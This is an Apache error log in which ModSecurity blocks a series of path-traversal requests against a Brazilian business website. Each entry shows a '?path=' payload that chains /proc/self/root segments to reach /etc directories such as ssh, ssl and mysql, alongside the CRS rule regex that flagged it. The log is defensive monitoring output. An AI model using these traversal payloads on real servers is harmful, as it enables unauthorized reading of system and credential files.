[Thu Mar 19 04:55:34.167030 2026] [:error] [pid 27293:tid 140411683178240] [client 74.7.243.128:33084] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur9v-YZRR_7pZ7nDJdvQAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:37.666180 2026] [:error] [pid 27293:tid 140411649607424] [client 74.7.243.128:33092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur-P-YZRR_7pZ7nDJdwQAAA8s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:38.751744 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.241.31:39580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur-gkwaGbbGflqUZCFiQAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:40.159991 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:33098] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur_Na6ubjKNq_cu4YSSwAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:42.377086 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.241.31:60042] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur_fu8EFLIOrSqIptukgAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:55:42.378823 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:34854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur_eyqAr6etmhZHNo0AwAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:45.095124 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.241.31:60044] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusAeoXxyEfFpUF8f_hJQAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:55:47.462237 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:34860] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusA-oXxyEfFpUF8f_hJwAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:48.871106 2026] [:error] [pid 14269:tid 140411683178240] [client 74.7.243.128:34864] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusBAbLMZ6AikZjR9UtngAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:50.251155 2026] [:error] [pid 19093:tid 140411599251200] [client 74.7.243.128:42500] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusBl_V7PWP6ixUYl6MUQAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:52.651457 2026] [:error] [pid 19093:tid 140411632822016] [client 74.7.243.128:42500] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusCF_V7PWP6ixUYl6MVwAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:53.966973 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:42516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusCeyqAr6etmhZHNo0BwAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:55.322946 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:42526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusC9a6ubjKNq_cu4YSVwAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:57.682486 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:42542] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusDQkwaGbbGflqUZCFngAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:56:01.167550 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:42552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusEda6ubjKNq_cu4YSYQAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:56:06.543523 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:38636] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusFvu8EFLIOrSqIptupgAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:56:07.843975 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:38650] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusFwkwaGbbGflqUZCFowAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:56:10.450162 2026] [:error] [pid 19093:tid 140411607643904] [client 74.7.243.128:38664] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusGl_V7PWP6ixUYl6MYAAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:56:14.307910 2026] [:error] [pid 27293:tid 140411574073088] [client 74.7.243.128:44284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusHv-YZRR_7pZ7nDJd1AAAA9Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:56:16.958024 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:44298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusIPu8EFLIOrSqIptusgAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:56:19.554633 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:44304] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abusI8df6f5d65gmYZRD6gAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
